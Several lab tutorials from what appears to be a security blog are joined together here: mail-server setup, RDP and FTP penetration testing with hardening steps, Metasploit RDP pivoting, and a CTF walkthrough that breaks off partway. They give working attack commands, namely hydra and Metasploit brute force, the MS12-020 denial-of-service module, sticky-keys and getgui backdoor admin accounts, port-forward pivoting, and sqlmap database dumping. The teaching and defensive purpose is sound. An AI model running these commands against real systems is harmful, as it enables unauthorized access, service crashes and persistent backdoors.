Hacking Articles|Raj Chandel's Blog

Hello friends! Today we are disscussing “configuration of SMTP mail server” for sending mail in your LAN network.

SMTP stands for simple mail transfer protocol communication between mail servers uses TCP port 25Mail clients on the other hand; often submit the outgoing emails to a mail server on port 587. For retrieving messages, client applications usually use either IMAP or POP3.

POP3 stands for Post Office Protocol (POP) is an application-layer Internet standard protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection. It uses port 110 for receiving mail

IMAP stands for Internet Message Access Protocol (IMAP) is also an Internet standard protocol used by e-mail clients to retrieve e-mail messages from a mail server over a TCP/IP connection. It uses port 143 for receiving mail

Lets strat!!

Configure static ip in your network for SMTP server as shown below.

Download hmailserver and install it in your system (windows). This installation program will create a hmailServer user with administration rights. Here you need to give password for admin so that you will be able to manage its installation.

Click on connectwhich will connect hmailserver to localhost.

Enter admin password to login into hmailserver and click on OK to continue.

You can take help of nmap to ensure whether SMTP with other Service such as IMAP and PoP3 has been running successfully on remote system (192.168.1.104).

Nmap 192.168.1.104

From given image to you can observe that all three services SMTP PoP3 IMAP are running on port 25 110 and 143 respectively.

Also new port 587 will get open for submission (SMTP outgoing mail).

After login into hmailserver it will ask to add domain name therefore click on ADD domain.

Enter the domain name of your choice such as pentestlab.localand click the check box for Enable.

Now at last click on save which will create a domain “pentestlab.local” into hailmail server.

From given image you can observe pentestlab.local had been created on the left panel. After then click on Account in order to create a new user for your mail server.

Click on ADD

Now follow the given below step to create a user for your own mail server.

Address: username (info)

Password: Give password for username

Click the check box for Enable

Click on save

Repeat the step to create more users for mail server.

From given image you can see I had created three users and for mail server at least you should create two accounts, one account for sender and other for receiver.

Select all three protocols SMTP, POP3, IMAP as show in image.

Click on SMTPgiven in left panel select Advance option and type your IP “192.168.1.104” to bind your local IP with mail server.

After than select Advance option in left panel and type you’re your domain name (for example pentestlab.local) as default domain and click on save.

Select Auto-ban under Advance given in left panel. Uncheck Enable for auto-ban.

Now open host file from given path system32 > drivers > etc > hosts

Edit your IP (192.168.0.104) with domain name (penetstlab.local) as shown in given image.

Now use two different systems in your local network for sending mail through them.

System 1^st

Open Microsoft outlook and select option Add account.

Click the radio button for “Manual setup or additional server type”

Click on next.

Click the radio button to choose service for IMAP or pop Click on next.

Enter the information of mail server for setting your account as given below:

User information

· Your name: info

· You email: info@pentestlab.local (provide an email id which you have created in hmail server account.)

Server information

· Account type: pop3

· Incoming mail server: 192.168.0.104

· Outgoing mail server: 192.168.0.104

Logon information

· Username: info@pentestlab.local

· Password:******

Click on more settingand choose option outgoing serverand enable following services:

· Use same setting (smtp) requires authentication

· Use same setting as my incoming mail server

Click on OK

In order to verify server setting for account click on “Test on Account Setting”

From given image you can observe it is showing green ticks for both tasks with status “completed”. It will show status “fail” if it found any error in account setting.

System 2^nd

Open Microsoft outlook and select option Add account and repeat above step for mail server account setting.

Note: now you’re having two different accounts on two different systems in same local network as sender and receiver.

Now we are testing our mail server by sending mail from one system to another with different account.

Sender: info@pentestlab.local

Receiver: raj@pentestlab.local

Here we are Sending message from system 1^st to 2^ndthrough Microsoft outlook. You can use another method also for account setting and sending mail for example Thunderbird.

Open raj account of 2^nd system and verify whether user received any mail form send info or not. Form given image can see we have successfully received mail in raj account.

In this way you can configure your own mail server for local network.

In this article we are discussing Remote Desktop penetration testing in four scenarios. Through that we are trying to explain how an attacker can breach security in different- different scenario and what types of major step should take by admin while activating RDP services to resist against attack.

Remote Desktop Protocol (RDP) also known as "Terminal Services Client" is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. RDP servers are built into Windows operating systems; by default, the server listens on TCP port 3389.

For more details visit Wikipedia.org

Let’s starts!!!

Suppose admin has allowed remote desktop service in his system for local network connection.

Scanning RDP with nmap

Attacker may take help of nmap to verify whether port 3389 is activated or not. For RDP penetration we are also using nmap in order to scan targeted system (192.168.0.102) for open RDP port.

Nmap-p 3389 192.168.0.102

If remote desktop service is allowed then nmap will show OPEN as state for port 3389, as shown in given image.

Brute force attack on RDP

In order to connect with RDP we always need login credential as authenticated connection. A valid user can enter his username and password but an invalid user (attacker) cannot able to guess correct credential for login therefore they retrieve credential through brute force attack.

We are using hydra to demonstrate brute force attack on RDP.

Hydra: It is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Open terminal in your kali Linux and type following command:

Hydra –v –f -l ignite-l ignite-P /root/Desktop/dict.txt rdp://192.168.0.102

From given below image you can read the username: ignite and password: 123456 which we have retrieve through brute force attack on port 3389.

Using this credential attacker can login for Remote Desktop service.

Add Security Policy against brute force

Admin can protect their network from brute force attack using Account lockout policy. Configure following policies under Security setting > Account policies > Account lockout policies

Account Lockout duration: Policy which defines the time period that a locked out account remains locked until become automatically unlock by itself or reset by admin. It will lock the account for specified time when user will cross the login attempt set by account lockout threshold.

Account lockout threshold: Policy which defines the number of fail logon attempt and will lock account for some period of time specified by Account lockout duration. It will allow maximum number of specified attempts for sing-in into your account.

Rest Account lockout counter after: Policy which defines the time period that must elapse after a failed logon attempt. The reset time must be less than or equal to the Account lockout duration.

Account Lockout duration: 30 minutes

Account lockout threshold: 2 invalid logon attempts

Rest Account lockout counter after: 30 minutes

If the number of attempts is greater than the value of Account lockout threshold, the attacker could potentially lock every account.

Now let’s test Account lockout policy by again making brute force attack on port 3389.

hydra-v-f-l ignite-l ignite-P /root/Desktop/dict.txt rdp://192.168.0.102

When attacker retrieves the username and password, he will surely use them for login but as you can see it took more than 2 attempts to crack the password therefore according to set policies the account should be get locked for 30 minutes.

Let’s assure it by login into remote desktop

Open the terminal and type “rdesktop 192.168.0.102 ” when you will get target screen, enter username and password which have retrieve from brute force.

From given image you can observe that we have entered above discovered username and password ignite: 12345.

When you (attacker) will submit your credential then it will give you a message that current account has been locked out and cannot be logon as shown in given image.

This will lock the account of the user ignite for 30 minutes and hence admin will come to know that someone has tried brute force attack for unauthorized access.

In this way we can protect brute force attack for unauthorized access.

Scan port 3389 for DOS attack

Many times in order to identify whether host is vulnerable to RDP or not, attacker use exploit MS12-020-check to test its strength.

Open the terminal in your kali Linux and Load metasploit framework now type following command to scan for vulnerability.

use auxiliary/scanner/rdp/ms12_020_check

msf auxiliary(ms12_020_check) > set rhosts 192.168.0.102

msf auxiliary(ms12_020_check) >set rport 3389

msf auxiliary(ms12_020_check) > exploit

From given image you can it is showing target is vulnerable, now you can use Google to find its exploit for attack.

Once attack knows that target port 3389 is vulnerable MS12-020-check then he will surly try to make an attack with Ms12-0200maxchannelids. This will launch a DOS attack on target system.

Now Type following command for DOS attack which will crash the system.

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.0.102

msf auxiliary(ms12_020_maxchannelids) > set rhost 3389

msf auxiliary(ms12_020_maxchannelids) > exploit

From given below image you can notice the target is system is being shutting down due some problem.

Criminal executor of DoS attacks often target sites or services hosted on high-profile web servers such as banks or credit card payment gatewaysto make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.

Enable RDP in Victims PC (2^ndScenario)

If attacker has hacked victim system in which RDP service is not enable then attacker himself can active this service using post exploitation module built by Rapid 7 inside metasploit.

Now to perform this we must need a meterpreter session of target system. From given image you can notice that have already meterpreter session of target system.

Here we have meterpreter session 1 through multi handler and session 2 from bypassuac for admin privileges.

Now type following command for generation post exploitation to enable RDP service.

use post/windows/manage/enable_rdp

msf post(enable_rdp) > sessions

msf post(enable_rdp) >exploit

This module makes it possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog.

use post/windows/manage/sticky_keys

msf post(sticky_keys) > sessions

msf post(sticky_keys) >exploit

Now connect with remote desktop using following command:

rdesktop 192.168.0.102

It will ask to submit the credential for login but we are not aware of it therefore we had lunched stick key attack above so that we can access victim command prompt by hitting 5 times shift key as shown in given image.

Another way to enable RDP

When you are holding meterpreter session of victim’s system type following command which enable RDP service moreover set credential of your own choice.

Meterpreter> run getgui-e-u raaz-p 1234

From given image you can observe it has edited user raaz with password 12345 into “Remote Desktop Users” and in “Administrators”. Now you can login with created user, connect with remote desktop using following command:

rdesktop 192.168.0.102

Enter username: raaz and password: 1234 for login.

Awesome!!! We had successfully login into remote system.

Port Forwarding (3^rdsenario)

You can forward port 3389 on another port for increasing system security although to perform this in your window operating system explore following location through registry editor.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

From given image you can see in the right panel port number is heighted, Click on it.

Shift Port from 3389 to specific port number

You will get an edit DWORD window where that you can edit 32 bit value. By default it will show d3dwhich is hexadecimal value for 3389.

Replace 3389 value from another value of your choice such as 3314 and select hexadecimal as base which will convert 3314 into cf2.

From given image you can see port 3314 is open now.

Secure RDP through window firewall (4^th Scenario)

Open window Firewall with Advance settings then move into its inbound rules and explore Remote Desktop (TCP-In) for domain profile for adding security filter by making some change in firewall setting.

Allow traffic from specific IP

After that it will open a window for changing its properties, click on scope. Here you will get two panels for type of connection establishes local and remote IP address.

In remote IP address choose 2nd option for specific IP address and enter an IP to which you want to allow for connecting remote desktop services as shown in given image.

It will stop all traffic coming from another IPs and increase the security of your network against any kind of attack.

Hello friends today we are sharing tips and tricks on FTP attacks and security through FTP penetration testing which will help to secure your server from any kind FTP attack.

FTPstand for File Transfer Protocol used for the transfer of computer files such as docs, pdf, multimedia and etc between a client and server on a computer network via port 21. Port 21 is default port which gets open when FTP is activated for sharing data.

Let’s start!!

Install & Configure FTP Server on Windows 7

Firstly we are going to setup an FTP server on our Windows 7 for sharing file in a LAN. In order to accomplish that we are going to open Control Panel>Programs>Programs and Features>Turn Windows features on or off as shown below.

Here Expand Internet Information Services and check the FTP Server option.

Also, ensure that FTP Extensibility and FTP Serviceare both checked as show below and click OK to begin Installation.

This Installs the IIS and FTP Service Manager, be Patient it might take some time.

Configure FTP Site in IIS

Now to open IIS, we will open Control Panel after then open System and Security and here we will open Administrative Tools. In Administrative Tools you will find IIS Manager as shown below, open it.

The new window of Internet information IIS Manager will come up; right-click Sites given in left panel under Connections, select Add FTP Site.

This will open a new window as shown below.

Enter the name of your FTP site of your choice, as shown in given image ignite.

Enter the path to the FTP folder you want to use to send and receive files. In our case, we created a folder named ftp in location C:\ftp.

And click next.

Allow following setting in Authenticationand Authorization for your FTP site and then click on Finish.

Authentication:Basic

Authorization:specific users (pc7)

Permission:read and write

Binding and SSL Settings, we will bind our IPv4 address to the server by allowing following setting then click on next.

· Enter IP: 192.168.1.128 and Port: 21.

· Enable the check box for Start FTP site automatically

· In SSL option select No SSL and click next.

From given image you can see we had successfully configure FTP server for Ignite. Now let’s try to connect with it for sharing files.

Connect client to FTP Server through WinSCP

WinSCP is free software which is used to access the ftp server. You can download it from here.

Protocol to: FTP

Encryption To: No Encryption

Host name: IP of the FTP Server

Port: 21

Username and Password: Windows login credentials of the user.

Click on login

As you can see I have successfully connected to my ftp server which have a file called demo.txt.

Scanning FTP with nmap

Attacker may take help of nmap to verify whether port 21 is activated or not. For FTP penetration, we are also using nmap in order to scan targeted system (192.168.1.128) for open FTP port.

nmap -p 21 192.168.1.128

If file transfer service is allowed then nmap will show OPEN as state for port 21, as shown in given image.

Version Enumeration on FTP

Now, let’s try to get the FTP version through ftp_version on Metasploit

Open the terminal in your kali Linux and Load metasploit framework now type following command to scan for FTP version.

use auxiliary/scanner/ftp/ftp_version

msf auxiliary(ftp_version) > set rhosts 192.168.1.128

msf auxiliary(ftp_version) > exploit

From given image, you can it is showing target is vulnerable. So, let’s protect it.

Hiding Banner

Open IIS Manger.

Click on Features View given in bottom of window.

A new window for FTP messages will come up where you can change Message Behavior.

· Enablesuppress default banner

· Enable Show detailed messages for local request

Now let’s check if our FTP version is still visible or not.

You can verify it by executing following command in kali Linux for NMAP version scan.

nmap -p 21 -sV 192.168.1.128

As you can see that our FTP version is no longer visible to anybody.

FTP Brute force Attack

Let’s try to make Brute force attack on our FTP Server using Metasploit.

Open the terminal in your kali Linux and Load metasploit framework now type following command to Brute force FTP login.

use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > set rhosts 192.168.1.128

msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt

msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(ftp_login) > set stop_on_success true

msf auxiliary(ftp_login) > exploit

From given image you can observe that our FTP server is not secure against brute force attack because it is showing matching combination of username and password for login. So let’s protect our FTP server against Brute force.

Secure FTP server against Brute Force Attack

Open IIS Manager

Now open FTP IPv4Address and Domain Restrictions. Here we are going to allow only a particular IP address to access the FTP server. This will allow only valid IP to get connect with FTP.

Allow specific IP to connect FTP

Now following given below step:

· Click on FTP IPv4 Address and Domain Restrictions

· Click on Add Allow Entry from the Actions Tab in right panel

· Select Specific IP Address and enter the IP address

· Click OK

Here you can also add range of IPs of your network.

Restrict IPs to connect FTP

Now repeat the step with some changes to restrict other IPs for denying to access FTP services.

Now following given below step:

· Click on FTP IPv4 Address and Domain Restrictions

· Click on Add deny Entry from the Actions Tab in right panel

· Select Specific IP Address and enter the IP address

· Click OK

Hence if any other user or attacker finds out credential for ftp login he cannot able to connect with server.

Let’s verify above setting by Brute force again in the same way we did before. From given image you can observe though it is showing incorrect combination for correct credential also.

FTP Port Forwarding

You can forward port 21 on another port for increasing server security although to perform this you need to open IIS

Now click on the Bindingson Actions Tab.

It will open a window as shown below where it is showing that FTP service is activated on port 21, now click on edit to replace this port into another.

From given image you can see we have are now using port 5000 for FTP services.

Now let’s check using nmap

nmap -p 5000 -sV 192.168.1.128

As you can see the FTP service have been shifted to port 5000

Now to verify if the service is actually running on port 5000 let’s login into FTP server using WinSCP and this time using port 5000 as shown below

Great!!! We are successfully connected with FTP server via port5000

FTP Log Monitoring

In IIS Manager we can also manage Logs of our FTP Server.

Here, we can Schedule the Logging and also manage the size of logs and Location of Logs

For monitoring ftp log follow given below steps:

Open FTP Logging in the Features View.

· Format of log file: click on W3C field and then select desired option such as date, time, client IP and etc.

· Directory:browse a location where you want to save the logs

· Schedule:Daily

Now if you want to view logs of FTP server you can open the directory which you have browsed for saving logs i.e. C:\inerpub\logs\Logsfiles

From given below image you can observe logs for FTP login.

Welcome to Internal penetration testing on FTP server where you will learn FTP installation and configuration, enumeration and attack, system security and precaution. As you know that File Transfer Protocol (FTP) used for the transfer of computer files between a client and server in a network via port 21.

Let’s start!!!

Requirement

FTP Server: ubuntu

Attacker system: Kali Linux

Client system: window

FTP Installation

Vsftpd stand for Very secure FTP daemon is an FTP server for Unix-like systems, including Linux.

Let’s start by typing following command to install vsftpd for FTP service.

apt-get install vsftpd

This will start FTP service on port 21

FTP Scanning

Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port 21.

Nmap -p 21 192.168.0.106

If service is activated in targeted server then nmap show open STATE for port 21.

Anonymous Login

FTP users may authenticate themselves with a clear-text sign-in protocol, normally in the form of a username and password, but can connect anonymously if the server is configured to allow it.

If anonymous login is allowed by admin to connect with FTP then anyone can login into server. An attacker can easily search for anonymous login permission using following metasploit exploit.

use auxiliary/scanner/ftp/anonymous

msf auxiliary(anonymous) >set rhosts 192.168.0.106

msf auxiliary(anonymous) >exploit

From given image you can observe that it is showing permission READ from FTP server.

Connect client to FTP Server through WinSCP

Now let’s ensure whether we can connect to FTP server as anonymous user or not.

Protocol to: FTP

Encryption To: No Encryption

Host name: IP of the FTP Server

Port: 21

Username and Password: anonymous: anonymous.

Click on login

Ohh!! Great, we have got FTP access through anonymous user.

Similarly an attacker can also get access of your FTP server therefore it is quite important for admin that he should not give any permission to anonymous user for login into server.

Disable Anonymous Login

Again in order to secure your server from anonymous user login then follow given below steps:

· Open vsftpd.conf

· Set anonymous enable = NO

· service vsftpd restart

Now repeat the attack to verify for anonymous login permission using metasploit as above. But this time exploit will fail to take out information of anonymous user login permission which you can confirm from given below image.

Enumerating FTP Banner

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for FTP version.

use auxiliary/scanner/ftp/ftp_version

msf auxiliary(ftp_version) > set rhosts 192.168.0.106

msf auxiliary(ftp_version) > exploit

From given image you can read the highlighted text which is showing vsftpd 3.0.2 is the installed version of FTP on target’s system.

While connected with telnet again anyone can identify installed version of FTP as shown image given image.

telnet 192.168.106 21

Once attacker enumerated FTP banners then he will surly Google for its vulnerability against any exploit, therefore admin should keep the banner hidden.

Hiding Banner

As we had discussed above how a banner grabbing can expose loopholes of any software or service running on remote system therefore after installing any service always hide their software versions.

Admin should make following changes in their configuration file to prevent banner information.

· Open vsftp.conffile

· Enable the comment “ftp_banner=Welcome to blah FTP service” by removing # from front of it.

Now save the whole text file after modification as shown in given image. Now it will not disclose banner information. Now restart the service using following command.

service vsftpd restart

Let’s verify version of running service after hiding banner through nmap version scan.

Nmap –p 21 -sV 192.168.0.106

Wonderful!! We are successful in hiding banner which you can confirm from given image.

FTP sniffing and Brute Force Attack

Though admin has hide the banner and disabled anonymous user but still attack has potential to steal credential for unauthorized access.

An attacker can take help of sniffing tools which can sniff the data packet travelling between server and client in a network and retrieve credential, this is known as sniffing, after then use them for unauthorized access. As we have discussed above FTP users may authenticate themselves with a clear-text sign-in protocol forusername andpassword.

Similarly we had captured TCP packet through wireshark for sniffing FTP credential, from given image you can observe User: raj and password: 123 had login successfully.

Use SSL Certificate to prevent Credential stealing

SSL stands for Secure Sockets Layer, the protocol which provides secure, encrypted communications between server and client, this encrypt data packet travelling between server-client networks.

Although attacker can sniff network data packet but will be not able to read fetched information because entire data will show in the form of cipher text.

Here administrations need to generate their own SSL certificate for secure authentication. Make the directory where the SSL certificate keys will be stored.

mkdir /etc/ssl/certificates

Type following command which generate a SSL certificate inside certificates directory using rsa: 2048 encryption valid for 365 days.

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/certificates/vsftpd.pem -out /etc/ssl/certificates/vsftpd.pem

For generating new private key it requires information such as Country name, state, email address and etc as shown given below image.

Now we need to open vsftpd.conffile for changing default setting by adding few line at the end of file.

rsa_cert_file=/etc/ssl/certificates/vsftpd.pem

rsa_private_key_file=/etc/ssl/certificates/vsftpd.pem

ssl_enable=YES

allow_anon_ssl=NO

force_local_data_ssl=YES

force_local_logins_ssl=YES

ssl_tlsv1=YES

ssl_sslv2=NO

ssl_sslv3=NO

require_ssl_reuse=NO

ssl_ciphers=HIGH

You can confirm it as shown in given image now save the changes and restart the service.

service vsftpd restart

Establish TSL/SSL connection with FTP through WinSCP

Now let’s ensure whether we can connect to FTP server as anonymous user or not.

Protocol to: FTP

Encryption To: TSL/SSL Explicit encryption

Host name: IP of the FTP Server

Port: 21

Username and Password: raj: 123

Click on login

Now server will send certificate to authorized user click on yes to store certificate and continue the encrypted connecting.

If attacker will sniff network packets he will get cipher text as shown in given image. In this way we can prevent sniffing from stealing credential in any network.

FTP Brute force Attack

Another way to steal credential is Brute force attack on FTP Server using Metasploit.

Open the terminal in your kali Linux and Load metasploit framework now type following command to Brute force FTP login.

use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > set rhosts 192.168.1.128

msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt

msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(ftp_login) > set stop_on_success true

msf auxiliary(ftp_login) > exploit

From given image you can observe that our FTP server is not secure against brute force attack because it is showing matching combination of username: raj and password: 123 for login.

Once attack steals your username and password, he try to login into server as authorized user and then can perform mischievous action such as steal your important data or replace with malicious file.

Bravo!! You can observe that using raj: 123 we had login successfully

Hence our server is not secure against such kind of attack so let’s protect our FTP server.

A threshold account lockout policy in windows which locked an account after certain numbers of ttempt that can be possible in UNIX also through Iptables chain rule.

Here admin can set iptable chain rules for certain number of login attempts and if user crossed the define number then account will get locked for some time period as specified by admin.

Type the given below command to set iptable chain rule for account lockout policy:

iptables -I INPUT -p tcp --dport 21 -i eth0 -m state --state NEW -m recent --set

iptables -I INPUT -p tcp --dport 21 -i eth0 -m state --state NEW -m recent --update --seconds 120 --hitcount 3 -j DROP

Now this above rule will allow only 3 chances for login into FTP server otherwise locked the account for 120 seconds (2 minutes).

service vsftpd restart

Let’s ensure iptable chain rule working by making brute force attack as above.

Great!! It has prevented by stopping brute force after 3 attempts but will get activated after 2 minute therefore admin should locked the account for long period of time.

Admin can take help vsftpd.logto view client IP who try to connect with vsftpd server.

cd /etc/vsftpd.log

tail vsftpd.og

Allow specific IP to connect vsftpd

Now open hosts.allow file from inside /etc to allow valid user to connect with server securely through specific IP.

At the end of text file enter specific IP to whom you want to give permission for establishing connection as shown in given image.

Vsftpd: 192.168.0.104

Restrict IP to connectvsftpd

It quite important that admin should restrict all IPs other than allowed IP (192.168.0.106) to protect network from establishing connect from unknown IP.

Open /etc/hosts.deny and specify list of hosts whom you want don’t to allow accessing into the system.

Vsftpd: All

Now open configure file of vsftpd and add following lines:

# TCP Wrappers

Tcp_wreappers= Yes

Restart the service vsftpd “service vsftpd restart”

When valid user try to connect with another IP then server will not allow established connection as shown in given image.

FTP Port forwarding

As we know port 21 is use as default port for FTP service therefore we can also secure port from 21 to another port.

Open vsftpd.conffile and follow given bellow steps:

· Disable connect from port 20=N0

· Add listen_port=5000

· service vsftpd restart

Now try to connect with FTP server via port 5000 with valid user credential and IP.

Great!!! We are successfully connected with FTP server via port 5000 in this way internal penetration testing helps us in system and network security.

Note: Always restart the vsftpd service after making any changes in its configuration file.

In our previous turtorial we had discussed on SSH pivoting and today we are going to discuss RDP pivoting.

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine (server): window operating system with two network interface

Target Machine (client): window 7 (Allow RDP service)

Use exploit MS17-010 or muti handler to hack the pivot machine and bypass its UAC to achieve admin privleges.

Sessions

Hence if you will count then currently attacker has hold 2 sessions, 1^st for meterpreter shell and 2^nd for bypass UAC of server.

Check network interface through following command:

Meterpreter> ifconfig

From given image you can observe two networks interface in victim’s system 1^st for IP 192.168.0.27 through which attacker is connected and 2^nd for IP 192.168.100.100 through which clients (targets) are connected.

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.100.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.100.0 network attacker need run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute

msf post(autoroute) > set session 2

msf post(autoroute) > exploit

Note: If you had not bypass UAC you can use session 1 for post exploit

This Module will perform an ARP scan for a given IP range through a Meterpreter Session.

use post/windows/gather/arp_scanner

msf post(arp_scanner) > set rhosts 192.168.100.100-110

msf post(arp_scanner) > set session 2

msf post(arp_scanner) > set thread 20

msf post(arp_scanner) > exploit

Here we found a new IP 192.1668.100.103as shown in given image. Let’s perform TCP port scan for activated services on this machine.

This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set ports 445, 3389

msf auxiliary(tcp) > set rhosts 192.168.100.103

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) >exploit

From given you can observe port 3389 and port 445 are open and we know that 3389 is used for RDP and 445 is use for SMB.

This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/smb/smb_login

msf exploit (smb_login)>set rhost 192.168.100.103

msf exploit (smb_login)>set user_file /root/Desktop/user.txt

msf exploit (smb_login)>set pass_file /root/Desktop/pass.txt

msf exploit (smb_login)>set stop_on_success true

msf exploit (smb_login)>exploit

From given image you can observe the highlights pentest: 123 has success login.

Now Type following command for port forwarding on localhost.

Meterpreter> portfwd add –l 3389 –p 3389 –r 192.168.100.103

-l: This is a local port to listen on.

-p: The remote port to connect on.

-r: The remote host address to connect on.

Now type following command to connect RDP client on localhost through port3389

Rdesktop 127.0.0.1:3389

Now it will ask to enter the credential for connecting with RDP client; Enter the combination of username and password you have retrieved from SMB login Exploit.

If you remembered we have retrieved pentest: 123 through smb login exploit which we are using for login.

Wonderful!! We had successfully exploit RDP client.

From Wikipedia

Hello friends! Today we are discussing “configuration of SMTP mail server” for sending mail in your LAN network.

SMTP stands for simple mail transfer protocol communication between mail servers uses TCP port 25 Mail clients. For retrieving messages, client applications usually use either IMAP or POP3.

Let’s start!!

Add Hostname and domain

With root privilege open hosts file for adding hostname and Domain name through following command:

sudo gedit /etc/hosts

Now add given below line in host file and then save it.

127.0.0.1 mail.ignite.lab ignite

Open hostname file with root privilege for changing the default hostname.

sudo gedit /etc/hostname

Now re-write the default hostname as “ignite” which we have mention in host file also, as shown in given image and save it.

Now restart the machine after making changes in hosts file and hostname.

sudo reboot

Now check hostname and domain by typing following command and assured the changes you had made.

hostname

hostname -f

Install Postfix

Postfix is the default Mail Transfer Agent (MTA) for Ubuntu. It is in Ubuntu's main repository, which means that it receives security updates. This guide explains how to install and configure postfix and set it up as an SMTP server using a secure connection.

sudo apt-get install postfix

A dialog box will pop for Postfix Configuration where you have to select Internet site as general type of mail configuration as shown in given image.

Enter Domain name (mail.ignite.lab) which you have save inside host file for system mail name and click on OK.

Postfix Configuration Setting

Open main.cf file and make following changes in this then save it.

sudo gedit /etc/postfix/main.cf

· Add subnet IP mynetworks = 127.0.0.0/8 192.168.1.0/24

· Enter inet_protocols = ipv4

· Add new line home_mailbox = Maildir/

Execute given below command after making changes in configuration file.

sudo service postfix restart

Now Type following command to view the list of open port to listen for incoming connections.

netstat –tnl

-t: for TCP ports

-n: for network

-l: forlist

From given image you can observe that STATE of port 25.

Install Dovecot

Dovecot is a Mail Delivery Agent, written with security primarily in mind. It supports the major mailbox formats: mbox or Maildir. This section explains how to set it up as an imap or pop3 server.

sudo apt-get install dovecot-imapd dovecot-pop3d

A dialog box will pop for configuring dovecot-core where you can select yes for create a self –signed SSL certificate.

Another POP up will ask hostnamethat will be used in ssl certificates. Enter your doamin name as shown in given image and click on OK.

Dovecot configuration setting

Open 10-auth.conf file through given below path:

sudo gedit /etc/dovecot/conf.d/10-auth.conf

Now make following changes in this as shown in given image then save it.

disable_plaintest_auth = yes

change auth mechanisms = plain login

Open 10-mail.conf file through given below path:

sudo gedit /etc/dovecot/conf.d/10-mail.conf

Now make following changes in this as shown in given image then save it.

mail_location= maildir:/home/%u/Maildir

Open 10-master.conf file through given below path:

sudo gedit /etc/dovecot/conf.d/10-master.conf

Enable port =143

Enable port = 110

Give permission for unix_listener auth-user db

Mode = 0600

User = postfix

Group = postfix

sudo service dovecot restart

Checkservice using netstat–tnl to view the list of open port to listen for incoming connections

From given image you can observe STATE LISTEN for port 110 and 143.

Configure mail Account in Thunderbird

We have already a user: sr let’s configure a mail account for him by adding following information in given text field

· Your name: sr

· Email address: sr@mail.ignite.lab

· Password: 1234 (user’s password)

Now click on continue then choose manual config tab.

Enter your network IP as server hostname (192.168.1.107) for incoming mail on port 143 and outgoing mail via port 25. Then click on done.

A new window will come up for security Exception click on tab Confirm security Exception given at bottom.

For sending mail we always need two users account one as sender another for receiver. Now type following command to add a new user.

adduser raj

Since we had already configure an account for user:sr in thunderbird , now create another mail account for usre:raj in thunderbird as created above.

Hence we are having two accounts in mail server for sending message

· Sender:raj@mail.ignite.lab

· Receiver:sr@mail.ignite.lab

Send mail using Thunderbird

Now write an Email from: sr@mail.ignite.lab to raj@mail.ignite.lab for testing mail server service as shown in given image. Click on send after typing message.

Open the inbox of receiver account where you will get a mail from sr@mail.ignite.lab as shown in given image.

In this way you can configure your own mail server for local network.

Hello friends! Today we are going to take another CTF challenge known as 6days. The credit for making this vm machine goes to “Geckom” and it is another CTF challenge where we have to find 6 flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.25 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sV 192.168.0.25

We find port 80 is open, so we open it in our browser

We take a look at our source code and found a few javascript files that look like base64 encoded.

We open them and find nothing interesting but when we join their name and decode them we find our 2^nd flag.

Inside the flag we find another base64 encode string, decoding it we find a string called imfadministrator.

We take a look around the website and in the source code of contact.php page we find our 1^st flag.

Flag 1 contains a base64 encoded string decoding it we find a string called allthefiles.

We open allthefiles and imfadministrator on the browser. We find that imfadministrator is a directory that leads to a login page.

In the contact.php page we found a few email addresses so we use cewl to make a dictionary.

We use burpsuite to launch a dictionary attack. We select the position and change the password from string to array.

Now we find the third flag in our response.

Now that we can access the page we see that the page might be vulnerable to sql injection.

Using burpsuite we save the request in a text file.

We use sqlmap to dump the database.

sqlmap -r /root/Desktop/imf.txt --dbs --batch --dump-all

We find the name of the pages along with another page called tutorial-incomplete. We open it on our browser and find a page with QR-code inside an image.

When we decode the QR-code we our 4^th flag.

Inside our flag we find a base64 encoded string, when we decode it we find a string called uploadr942.php

We open it on our browser and find a page to upload a file.

Now while uploading a shell we find that it is protected from WAF, so we create a custom shell and save it as GIF file to bypass the WAF.

Now we upload the file and check the response from the server to find where our file is uploaded.

